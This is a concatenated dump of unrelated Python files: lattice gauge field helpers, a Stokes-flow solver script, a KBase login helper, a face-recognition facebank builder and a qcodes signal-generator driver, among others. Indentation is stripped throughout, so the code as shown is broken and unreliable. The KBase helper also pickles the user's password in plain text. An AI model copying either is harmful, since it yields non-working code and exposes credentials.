hyperchargeMat = tf.stack([hyperchargeMat, hyperchargeMat, hyperchargeMat], -3)
return higgsMat, isospinMat, hyperchargeMat
# Project a [..., 2, 2] Matrix field to the SU(2) Lie algebra.
def projectToSu2LieAlg(scalarField):
projectedField = scalarField
# Make antihermitian
projectedField = (0.5*(projectedField + \
tf.linalg.adjoint(projectedField)))
# Make traceless
trace = tf.linalg.trace(projectedField)
trace = tf.expand_dims(trace, -1)
trace = tf.expand_dims(trace, -1)
projectedField = (projectedField - 0.5*trace)
return projectedField
# Project a [..., 2, 2] Matrix field to the SU(2) Lie group.
# This has some array manipulation in to avoid big overheads with calculating
# determinants and inverses for 2 x 2 matrices using built-in functions
def projectToSu2(gaugeField):
projectedField = gaugeField
adjugate1 = tf.stack([gaugeField[...,1,1], -gaugeField[...,0,1]], -1)
adjugate2 = tf.stack([-gaugeField[...,1,0], gaugeField[...,0,0]], -1)
adjugate = tf.math.conj(tf.stack([adjugate1, adjugate2], -1))
# Make proportional to unitary matrix
determinant = gaugeField[...,0,0]*gaugeField[...,1,1] -\
gaugeField[...,0,1]*gaugeField[...,1,0]
determinant = tf.expand_dims(determinant, -1)
determinant = tf.expand_dims(determinant, -1)
projectedField = (0.5*(projectedField + \
adjugate))
# Normalise
determinant = projectedField[...,0,0]*projectedField[...,1,1] -\
projectedField[...,0,1]*projectedField[...,1,0]
determinant = tf.expand_dims(determinant, -1)
determinant = tf.expand_dims(determinant, -1)
projectedField = (projectedField / tf.math.sqrt(determinant))
return projectedField
# Project a [..., 1, 1] field to the U(1) Lie group
def projectToU1(gaugeField):
projectedField = gaugeField
# Normalise
magnitude = tf.abs(gaugeField)
projectedField = (projectedField / tf.cast(magnitude, tf.complex128))
return projectedField
# Remove the part of a gradient field that points away from the SU(2) manifold
def projectSu2Gradients(su2Gradients, su2Field):
trProduct = tf.linalg.trace(su2Gradients @ tf.linalg.adjoint(su2Field))
trProduct = tf.expand_dims(trProduct, -1)
trProduct = tf.expand_dims(trProduct, -1)
# print(tf.shape(trProduct))
projectedGradients = su2Gradients - 0.5*trProduct*su2Field
return projectedGradients
# # Remove the part of a gradient field that points away from the U(1) manifold
def projectU1Gradients(u1Gradients, u1Field):
gradFieldProduct = u1Gradients @ tf.linalg.adjoint(u1Field)
# print(tf.shape(trProduct))
projectedGradients = u1Gradients - tf.cast(
tf.math.real(gradFieldProduct), tf.complex128
) @ u1Field
return projectedGradients
# Compute the inner product of two fields
# If trace is True, trace is taken before summing
# If adjoint is true, the first argument is hermitian conjugated
def innerProduct(field1, field2, tr=True, adj=False):
input1 = tf.linalg.adjoint(field1) if adj else field1
input2 = field2
productField = input1 @ input2
if tr:
productField = tf.linalg.trace(productField)
return tf.math.abs(tf.reduce_sum(productField))
# Linearly superpose two SU(2) gauge fields
def linearSuperpose(gaugeField1, gaugeField2):
# Convert matrices to vectors
vec1 = su2ToVec(gaugeField1)
vec2 = su2ToVec(gaugeField2)
# Add the vectors and output the correspoding SU(2) field
outputVec = vec1 + vec2
outputField = vecToSu2(outputVec)
return outputField
# Generate a constant SU(2) magnetic field of given direction and number of flux
# quanta. Assumes unitary gauge with scalar field parallel to pauli3
def constantMagneticField(X, Y, Z, fieldDir, numFluxQuanta):
coords = [X,Y,Z]
latShape = tf.shape(X)
zeroMat = tf.zeros(latShape, dtype=tf.float64)
flux = 4*np.pi*tf.cast(numFluxQuanta, tf.float64)
cpt1 = (fieldDir + 1) % 3
cpt2 = (fieldDir + 2) % 3
gaugeVecDir2 = 0.5*flux / (
tf.cast(latShape[cpt2]*latShape[cpt1], tf.float64)
) * coords[cpt1]
# Mask for sites on the cpt1 boundary
cpt1FaceShape = tf.tensor_scatter_nd_update(latShape, [[cpt1]], [1])
# cpt1FaceShape[cpt1] = 1
cpt1Mask = tf.ones(cpt1FaceShape, dtype=tf.float64)
paddings = [[0,0], [0,0], [0,0]]
paddings[cpt1] = [0, latShape[cpt1] - 1]
cpt1Mask = tf.pad(cpt1Mask, paddings, constant_values=0)
gaugeVecDir2 += cpt1Mask*0.5*flux / tf.cast(latShape[cpt2], tf.float64)
gaugeVecDir1 = zeroMat -\
0.5*cpt1Mask*coords[cpt2]*flux / tf.cast(latShape[cpt2], tf.float64)
gaugeCpts = [zeroMat, zeroMat, zeroMat]
gaugeCpts[fieldDir] = vecToSu2(tf.stack([zeroMat, zeroMat, zeroMat], -1))
gaugeCpts[cpt1] = vecToSu2(tf.stack([zeroMat, zeroMat, gaugeVecDir1], -1))
gaugeCpts[cpt2] = vecToSu2(tf.stack([zeroMat, zeroMat, gaugeVecDir2], -1))
return tf.stack(gaugeCpts, -3)
# Gets the indices of the sites on the boundary
def boundaryIndices(latShape, cpt, sign):
if sign == +1:
return sliceIndices(latShape, cpt, latShape[cpt] - 1)
else:
return sliceIndices(latShape, cpt, 0)
return indices
def sliceIndices(latShape, cpt, slicePosition):
indexVectors = [tf.range(latShape[0]), tf.range(latShape[1]), tf.range(latShape[2])]
indexVectors[cpt] = slicePosition
indices = tf.stack(tf.meshgrid(indexVectors[0], indexVectors[1], indexVectors[2], indexing="ij"), -1)
return indices |
py | 1a3480d452cba819453dc72ce0911c8a4b11b71d | import sys
import petsc4py
petsc4py.init(sys.argv)
import numpy as np
import pickle
# from time import time
# from scipy.io import loadmat
# from src.stokes_flow import problem_dic, obj_dic
# from src.geo import *
from petsc4py import PETSc
from src import stokes_flow as sf
from src.myio import *
from src.objComposite import *
# from src.myvtk import *
# from src.support_class import *
from codeStore import helix_common
def get_problem_kwargs(**main_kwargs):
problem_kwargs = get_solver_kwargs()
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
problem_kwargs['fileHandle'] = fileHandle
dumb_d = OptDB.getReal('dumb_d', 5)
problem_kwargs['dumb_d'] = dumb_d
dumb_theta = OptDB.getReal('dumb_theta', np.pi / 3)
problem_kwargs['dumb_theta'] = dumb_theta
kwargs_list = (get_helicoid_kwargs(), get_sphere_kwargs(),
get_forcefree_kwargs(), main_kwargs,)
for t_kwargs in kwargs_list:
for key in t_kwargs:
problem_kwargs[key] = t_kwargs[key]
return problem_kwargs
def print_case_info(**problem_kwargs):
fileHandle = problem_kwargs['fileHandle']
print_solver_info(**problem_kwargs)
print_forcefree_info(**problem_kwargs)
print_sphere_info(fileHandle, **problem_kwargs)
dumb_d = problem_kwargs['dumb_d']
dumb_theta = problem_kwargs['dumb_theta']
PETSc.Sys.Print(' dumb_d: %f, dumb_theta: %f' % (dumb_d, dumb_theta))
print_helicoid_info(**problem_kwargs)
return True
def do_solve_base_flow(basei, problem, obj_comp, uw_Base_list, sumFT_Base_list):
problem.set_basei(basei)
problem.create_F_U()
problem.solve()
PETSc.Sys.Print('---> basei %d' % basei)
PETSc.Sys.Print(obj_comp.get_total_force())
ref_U = obj_comp.get_ref_U()
PETSc.Sys.Print('ref_u: %f %f %f' % (ref_U[0], ref_U[1], ref_U[2]))
PETSc.Sys.Print('ref_w: %f %f %f' % (ref_U[3], ref_U[4], ref_U[5]))
uw_Base_list.append(obj_comp.get_ref_U())
sumFT_Base_list.append(obj_comp.get_total_force())
return uw_Base_list, sumFT_Base_list
def do_solve_base_flow_iter(basei, problem, obj_comp, uw_Base_list, sumFT_Base_list):
problem.set_basei(basei)
problem.create_F_U()
problem.do_iterate3()
PETSc.Sys.Print('---> basei %d' % basei)
PETSc.Sys.Print(obj_comp.get_total_force())
ref_U = obj_comp.get_ref_U()
PETSc.Sys.Print('ref_u: %f %f %f' % (ref_U[0], ref_U[1], ref_U[2]))
PETSc.Sys.Print('ref_w: %f %f %f' % (ref_U[3], ref_U[4], ref_U[5]))
uw_Base_list.append(obj_comp.get_ref_U())
sumFT_Base_list.append(obj_comp.get_total_force())
return uw_Base_list, sumFT_Base_list
# @profile
def main_fun(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
helicoid_comp = create_helicoid_comp(namehandle='helicoid', **problem_kwargs)
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(helicoid_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (0, 1, 2, 3, 4, 5, 6, 7, 8):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
# active case
helicoid_comp.set_rel_U_list([np.zeros(6), ] * len(helicoid_comp.get_obj_list()))
basei = 9
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
pickle_dict = {'problem_kwargs': problem_kwargs,
'u_nodes': helicoid_comp.get_u_nodes(),
'f_nodes': helicoid_comp.get_f_nodes(),
'uw_Base_list': uw_Base_list,
'sumFT_Base_list': sumFT_Base_list, }
with open('%s.pickle' % fileHandle, 'wb') as handle:
pickle.dump(pickle_dict, handle, protocol=4)
PETSc.Sys.Print('save table_data to %s.pickle' % fileHandle)
return True
def main_fun_E(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
helicoid_comp = create_helicoid_comp(namehandle='helicoid', **problem_kwargs)
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(helicoid_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (1, 2, 3, 4, 5):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
return True
def main_fun_dumb_E(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'dumb_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
# field_range = np.array([[-3, -3, -3], [3, 3, 3]])
# n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
# main_kwargs['field_range'] = field_range
# main_kwargs['n_grid'] = n_grid
# main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
dumb_obj = creat_dumb_obj(**problem_kwargs)
dumb_comp = sf.ForceFreeComposite(center=np.zeros(3), norm=np.array((0, 0, 1)),
name='dumb_comp')
dumb_comp.add_obj(obj=dumb_obj, rel_U=np.zeros(6))
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(dumb_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (1, 2, 3, 4, 5):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, dumb_comp,
uw_Base_list, sumFT_Base_list)
return True
def main_fun_iter(**main_kwargs):
err_msg = 'main_fun_iter() do NOT finish yet. '
assert 1 == 2, err_msg
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
hlx_ini_rot_theta = problem_kwargs['hlx_ini_rot_theta']
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
tail_obj_list = create_ecoli_tail(moveh=np.zeros(3), **problem_kwargs)
tail_comp = sf.ForceFreeComposite(center=np.zeros(3), norm=np.array((0, 0, 1)),
name='tail_comp')
for tobj in tail_obj_list:
tobj.node_rotation(norm=np.array([0, 1, 0]), theta=hlx_ini_rot_theta)
tail_comp.add_obj(obj=tobj, rel_U=np.zeros(6))
problem = sf.StrainRateBaseForceFreeIterateProblem(**problem_kwargs)
problem.add_obj(tail_comp)
problem.set_iterate_comp(tail_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (0, 1, 2, 3, 4, 5, 6, 7, 8):
uw_Base_list, sumFT_Base_list = do_solve_base_flow_iter(basei, problem, tail_comp,
uw_Base_list, sumFT_Base_list)
# active case
tail_comp.set_rel_U_list([np.zeros(6), ] * len(tail_obj_list))
basei = 9
uw_Base_list, sumFT_Base_list = do_solve_base_flow_iter(basei, problem, tail_comp,
uw_Base_list, sumFT_Base_list)
pickle_dict = {'problem_kwargs': problem_kwargs,
'u_nodes': tail_comp.get_u_nodes(),
'f_nodes': tail_comp.get_f_nodes(),
'uw_Base_list': uw_Base_list,
'sumFT_Base_list': sumFT_Base_list, }
with open('%s.pickle' % fileHandle, 'wb') as handle:
pickle.dump(pickle_dict, handle, protocol=4)
PETSc.Sys.Print('save table_data to %s.pickle' % fileHandle)
# print_single_ecoli_force_result(problem, part='tail', prefix='tran', **problem_kwargs)
return True
if __name__ == '__main__':
OptDB = PETSc.Options()
# if OptDB.getBool('main_fun_iter', False):
# OptDB.setValue('main_fun', False)
# main_fun_iter()
if OptDB.getBool('main_fun_E', False):
OptDB.setValue('main_fun', False)
main_fun_E()
if OptDB.getBool('main_fun_dumb_E', False):
OptDB.setValue('main_fun', False)
main_fun_dumb_E()
if OptDB.getBool('main_fun', True):
main_fun()
|
py | 1a34815553823bbee70095af57bade0264129849 | # kbInterface.py
"""Python module to get a KBase GenomeAnnotation interface."""
def get(ref):
import os
from doekbase.data_api.annotation.genome_annotation import api
try:
token=os.environ['KB_AUTH_TOKEN']
except KeyError:
acc=loadKbAcc()
os.environ['KB_AUTH_TOKEN']=getKbSession(acc['username'],acc['password'])
token=os.environ['KB_AUTH_TOKEN']
return api.GenomeAnnotationAPI(
token=token,
services={'workspace_service_url': 'https://kbase.us/services/ws/'},
ref=ref)
def loadKbAcc():
#import bcrypt
from subprocess import call
import pickle
from getpass import getpass
import os.path
filepath=os.path.join(os.path.expanduser('~'),".kbacc")
print("Retrieving KBase account info.\n")
try:
acc=pickle.load(open(filepath,"rb"))
except:
print("No passfile found. Enter KBase account info.\n")
username = raw_input("Username: ");
password = getpass("Password: ");
#hashed = bcrypt.hashpw(password, bcrypt.gensalt())
acc={'username': username, 'password': password}
pickle.dump(acc,open(filepath,"wb"))
call(["chmod","0600",filepath])
return acc
def getKbSession(user_id,password):
from requests import Session
import json
payload = {
'fields': 'un,token,user_id,kbase_sessionid,name',
'user_id': user_id,
'password': password,
'status': 1
}
s = Session()
log = s.post('https://kbase.us/services/authorization/Sessions/Login', data=payload)
jres = json.loads(log.text)
return jres['token']
|
py | 1a34830e15f3c7334996b247a33649c906b3e42e | from time import time
import flair
import numpy as np
import torch
from flair.models import SequenceTagger
from REL.mention_detection import MentionDetection
from REL.training_datasets import TrainingEvaluationDatasets
np.random.seed(seed=42)
MAX_SIZE_DOCS = 10
base_url = ""
wiki_version = ""
datasets = TrainingEvaluationDatasets(base_url, wiki_version).load()["aida_testB"]
docs = {}
for i, doc in enumerate(datasets):
sentences = []
for x in datasets[doc]:
if x["sentence"] not in sentences:
sentences.append(x["sentence"])
text = ". ".join([x for x in sentences])
if len(docs) == MAX_SIZE_DOCS:
print("length docs is {}.".format(len(docs)))
print("====================")
break
if len(text.split()) > 200:
docs[doc] = [text, []]
mention_detection = MentionDetection(base_url, wiki_version)
# Alternatively use Flair NER tagger.
tagger_ner = SequenceTagger.load("ner-fast")
start = time()
mentions_dataset, n_mentions = mention_detection.find_mentions(docs, tagger_ner)
print("MD took: {}".format(time() - start))
|
py | 1a348503cfaefa0e704160ceeeb24f91c7d9f43f | # -*- coding: utf-8 -*-
"""
Exo sur output treetagger
"""
import argparse
class Word:
""" Classe Word : définit un mot simple de la langue """
def __init__(self, form, lemma, pos):
self.form = form
self.lemma = lemma
self.pos = pos
def __repr__(self):
return f"{self.form}"
def brown_string(self):
return f"{self.form}/{self.lemma}/{self.pos}"
def is_inflected(self):
"""
Returns True is the word is inflected
False otherwise
"""
if self.form.lower() != self.lemma:
return True
else:
return False
def main():
parser = argparse.ArgumentParser(description="Exo output treetagger")
parser.add_argument("-v", "--verbose", help="verbose mode", action="store_true")
parser.add_argument("file", help="le fichier tsv")
args = parser.parse_args()
words = []
with open(args.file) as tt:
for line in tt:
line = line.rstrip()
items = line.split('\t')
words.append(Word(items[0], items[2], items[1]))
res = [w for w in words if w.is_inflected() and w.pos != "PUN"]
print(res)
if __name__ == "__main__":
main() |
py | 1a348578809da714bfecb441636ef4b9f1c85ca1 | from datetime import datetime
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import io
from torchvision import transforms as trans
from data.data_pipe import de_preprocess
import torch
from model import l2_norm
import pdb
import cv2
from face_detection.accuracy_evaluation import predict
from face_detection.config_farm import configuration_10_320_20L_5scales_v2 as cfg
import mxnet as mx
import numpy as np
def separate_bn_paras(modules):
if not isinstance(modules, list):
modules = [*modules.modules()]
paras_only_bn = []
paras_wo_bn = []
for layer in modules:
if 'model' in str(layer.__class__):
continue
if 'container' in str(layer.__class__):
continue
else:
if 'batchnorm' in str(layer.__class__):
paras_only_bn.extend([*layer.parameters()])
else:
paras_wo_bn.extend([*layer.parameters()])
return paras_only_bn, paras_wo_bn
def prepare_facebank(conf, model, mtcnn, tta = True):
model.eval()
ctx = mx.gpu(0)
symbol_file_path = 'face_detection/symbol_farm/symbol_10_320_20L_5scales_v2_deploy.json'
model_file_path = 'face_detection/saved_model/configuration_10_320_20L_5scales_v2/train_10_320_20L_5scales_v2_iter_1800000.params'
face_detector = predict.Predict(mxnet=mx,
symbol_file_path=symbol_file_path,
model_file_path=model_file_path,
ctx=ctx,
receptive_field_list=cfg.param_receptive_field_list,
receptive_field_stride=cfg.param_receptive_field_stride,
bbox_small_list=cfg.param_bbox_small_list,
bbox_large_list=cfg.param_bbox_large_list,
receptive_field_center_start=cfg.param_receptive_field_center_start,
num_output_scales=cfg.param_num_output_scales)
embeddings = []
names = ['Unknown']
for path in conf.facebank_path.iterdir():
if path.is_file():
continue
else:
embs = []
for filename in path.iterdir():
if not filename.is_file():
continue
else:
try:
print(filename)
image = Image.open(filename)
img = image
# img = np.array(image)
# img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
# faces, infer_time = face_detector.predict(img, resize_scale=0.5, score_threshold=0.4, top_k=10000, \
# NMS_threshold=0.2, NMS_flag=True, skip_scale_branch_list=[])
# img_size = 112
# print(len(faces))
# margin = 0
# img_h, img_w, _ = np.shape(image)
# for i, bbox in enumerate(faces):
# x1, y1, x2, y2= bbox[0], bbox[1], bbox[2] ,bbox[3]
# xw1 = max(int(x1 - margin ), 0)
# yw1 = max(int(y1 - margin ), 0)
# xw2 = min(int(x2 + margin ), img_w - 1)
# yw2 = min(int(y2 + margin ), img_h - 1)
# face = cv2.resize(img[yw1:yw2 + 1, xw1:xw2 + 1], (img_size, img_size))
# # img = Image.fromarray(face[...,::-1])
# img = face
# break
except Exception as e:
print(e)
continue
if img.size != (112, 112):
img = mtcnn.align(img)
print(type(img))
# cv2.imshow('window', img)
# img.show()
# if cv2.waitKey() == ord('q'):
# break
with torch.no_grad():
if tta:
img = trans.functional.to_grayscale(img, num_output_channels=3)
mirror = trans.functional.hflip(img)
emb = model(conf.test_transform(img).to(conf.device).unsqueeze(0))
emb_mirror = model(conf.test_transform(mirror).to(conf.device).unsqueeze(0))
v_mirror = trans.functional.vflip(mirror)
v_emb_mirror = model(conf.test_transform(v_mirror).to(conf.device).unsqueeze(0))
v_img = trans.functional.vflip(img)
v_img_mirror = model(conf.test_transform(v_img).to(conf.device).unsqueeze(0))
embs.append(l2_norm(emb + emb_mirror))
# embs.append(l2_norm(emb + emb_mirror + v_emb_mirror + v_img_mirror))
# embs.append(emb)
# embs.append(emb_mirror)
# embs.append(v_emb_mirror)
# embs.append(v_img_mirror)
else:
embs.append(model(conf.test_transform(img).to(conf.device).unsqueeze(0)))
if len(embs) == 0:
continue
embedding = torch.cat(embs).mean(0,keepdim=True)
embeddings.append(embedding)
names.append(path.name)
embeddings = torch.cat(embeddings)
names = np.array(names)
torch.save(embeddings, conf.facebank_path/'facebank.pth')
np.save(conf.facebank_path/'names', names)
return embeddings, names
def load_facebank(conf):
embeddings = torch.load(conf.facebank_path/'facebank.pth')
names = np.load(conf.facebank_path/'names.npy')
return embeddings, names
def face_reader(conf, conn, flag, boxes_arr, result_arr, learner, mtcnn, targets, tta):
while True:
try:
image = conn.recv()
except:
continue
try:
bboxes, faces = mtcnn.align_multi(image, limit=conf.face_limit)
except:
bboxes = []
results = learner.infer(conf, faces, targets, tta)
if len(bboxes) > 0:
print('bboxes in reader : {}'.format(bboxes))
bboxes = bboxes[:,:-1] #shape:[10,4],only keep 10 highest possibiity faces
bboxes = bboxes.astype(int)
bboxes = bboxes + [-1,-1,1,1] # personal choice
assert bboxes.shape[0] == results.shape[0],'bbox and faces number not same'
bboxes = bboxes.reshape([-1])
for i in range(len(boxes_arr)):
if i < len(bboxes):
boxes_arr[i] = bboxes[i]
else:
boxes_arr[i] = 0
for i in range(len(result_arr)):
if i < len(results):
result_arr[i] = results[i]
else:
result_arr[i] = -1
else:
for i in range(len(boxes_arr)):
boxes_arr[i] = 0 # by default,it's all 0
for i in range(len(result_arr)):
result_arr[i] = -1 # by default,it's all -1
print('boxes_arr : {}'.format(boxes_arr[:4]))
print('result_arr : {}'.format(result_arr[:4]))
flag.value = 0
hflip = trans.Compose([
de_preprocess,
trans.ToPILImage(),
trans.functional.hflip,
trans.ToTensor(),
trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
def hflip_batch(imgs_tensor):
hfliped_imgs = torch.empty_like(imgs_tensor)
for i, img_ten in enumerate(imgs_tensor):
hfliped_imgs[i] = hflip(img_ten)
return hfliped_imgs
def get_time():
return (str(datetime.now())[:-10]).replace(' ','-').replace(':','-')
def gen_plot(fpr, tpr):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.xlabel("FPR", fontsize=14)
plt.ylabel("TPR", fontsize=14)
plt.title("ROC Curve", fontsize=14)
plot = plt.plot(fpr, tpr, linewidth=2)
buf = io.BytesIO()
plt.savefig(buf, format='jpeg')
buf.seek(0)
plt.close()
return buf
def draw_box_name(bbox,name,frame):
frame = cv2.rectangle(frame,(bbox[0],bbox[1]),(bbox[2],bbox[3]),(0,0,255),6)
frame = cv2.putText(frame,
name,
(bbox[0],bbox[1]),
cv2.FONT_HERSHEY_SIMPLEX,
2,
(0,255,0),
3,
cv2.LINE_AA)
return frame |
py | 1a348701088d22c2844fb1e68610f874db513b5f | from numpy import rad2deg, deg2rad
from qcodes import VisaInstrument, validators as vals
def parse_on_off(stat):
if stat.startswith('0'):
stat = 'Off'
elif stat.startswith('1'):
stat = 'On'
return stat
def rad2deg_mod(rad):
deg = rad2deg(float(rad))
return deg
class Keysight_E8257D(VisaInstrument):
"""
This is the qcodes driver for the Keysight_E8257D signal generator
Status: beta-version.
TODO:
- Add all parameters that are in the manual
This driver will most likely work for multiple Agilent sources.
This driver does not contain all commands available for the E8527D but
only the ones most commonly used.
"""
def __init__(self, name:str, address:str, step_attenuator:bool=False,
pulse_option:bool=True, **kwargs):
super().__init__(name, address, **kwargs)
self.add_parameter(name='frequency',
label='Frequency',
unit='Hz',
get_cmd='FREQ:CW?',
set_cmd='FREQ:CW' + ' {:.8f}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(2.5e5, 20e9))
self.add_parameter(name='phase',
label='Phase',
unit='deg',
get_cmd='PHASE?',
set_cmd='PHASE' + ' {:.8f}',
get_parser=rad2deg_mod,
set_parser=deg2rad,
vals=vals.Numbers(-180, 180))
self.add_parameter(name='power',
label='Power',
unit='dBm',
get_cmd='POW:AMPL?',
set_cmd='POW:AMPL' + ' {:.4f}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-130, 25))
if pulse_option:
self.add_parameter(name='pulse_delay',
label='Pulse_Delay',
unit='s',
get_cmd='PULM:INT:DEL?',
set_cmd='PULM:INT:DEL' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-70e-9,42))
self.add_parameter(name='pulse_period',
label='Pulse_period',
unit='s',
get_cmd='PULM:INT:PER?',
set_cmd='PULM:INT:PER' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-70e-9, 42))
self.add_parameter(name='pulse_width',
label='Pulse_width',
unit='s',
get_cmd='PULM:INT:PWID?',
set_cmd='PULM:INT:PWID' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(10e-9, 42))
self.add_parameter('pulse_mod',
get_cmd='PULM:STAT?',
set_cmd='PULM:STAT' + ' {}',
get_parser=parse_on_off,
# Only listed most common spellings idealy want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('pulse_src',
get_cmd='PULM:SOUR?',
set_cmd='PULM:SOUR' + ' {}',
vals=vals.Enum('INT', 'EXT'))
self.add_parameter('pulse_int_mode',
get_cmd='PULM:SOUR:INT?',
set_cmd='PULM:SOUR:INT' + ' {}',
vals=vals.Enum('FRUN', 'TRIG', 'GATE'))
self.add_parameter('modulation',
get_cmd='OUTP:MOD?',
set_cmd='OUTP:MOD' + ' {}',
get_parser=parse_on_off,
# Only listed most common spellings idealy want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('status',
get_cmd='OUTP?',
set_cmd='OUTP' + ' {}',
get_parser=parse_on_off,
# Only listed most common spellings idealy want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('alc',
get_cmd='POW:ALC?',
set_cmd='POW:ALC' + ' {}',
get_parser=parse_on_off,
# Only listed most common spellings idealy want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.connect_message()
def on(self):
self.set('status', 'on')
def off(self):
self.set('status', 'off')
def mod_on(self):
self.set('modulation', 'on')
def mod_off(self):
self.set('modulation', 'off')
def alc_on(self):
self.set('alc', 'on')
def alc_off(self):
self.set('alc', 'off')
def pulse_on(self):
self.set('pulse_mod', 'on')
def pulse_off(self):
self.set('pulse_mod', 'off')
def pulse_source_int(self):
self.set('pulse_src', 'INT')
def pulse_source_ext(self):
self.set('pulse_src', 'EXT')
def pulse_int_mode_frun(self):
self.set('pulse_int_mode', 'FRUN')
def pulse_int_mode_trig(self):
self.set('pulse_int_mode', 'TRIG')
def pulse_int_mode_gate(self):
self.set('pulse_int_mode', 'GATE')
|
py | 1a348748e54a3ab1286ebb1ba6dfa2015c056887 | __version__ = '0.0.0'
default_app_config = 'celery_task_plus.apps.CeleryTaskPlusConfig'
|
py | 1a34887706988384e80a8046e52cbed6b4ea8178 | #! /usr/bin/env python3
# Script to parse spec output CSVs and produce C files.
# Released by lisa neigut under CC0:
# https://creativecommons.org/publicdomain/zero/1.0/
#
# Reads from stdin, outputs C header or body file.
#
# Standard message types:
# msgtype,<msgname>,<value>[,<option>]
# msgdata,<msgname>,<fieldname>,<typename>,[<count>][,<option>]
#
# TLV types:
# tlvtype,<tlvstreamname>,<tlvname>,<value>[,<option>]
# tlvdata,<tlvstreamname>,<tlvname>,<fieldname>,<typename>,[<count>][,<option>]
#
# Subtypes:
# subtype,<subtypename>
# subtypedata,<subtypename>,<fieldname>,<typename>,[<count>]
from argparse import ArgumentParser, REMAINDER
from collections import OrderedDict
import copy
import fileinput
from mako.template import Template
import os
import re
import sys
# Generator to give us one line at a time.
def next_line(args, lines):
if lines is None:
lines = fileinput.input(args)
for i, line in enumerate(lines):
yield i + 1, line.strip()
# Class definitions, to keep things classy
class Field(object):
def __init__(self, name, type_obj, extensions=[],
field_comments=[], optional=False):
self.name = name
self.type_obj = type_obj
self.count = 1
self.len_field_of = None
self.len_field = None
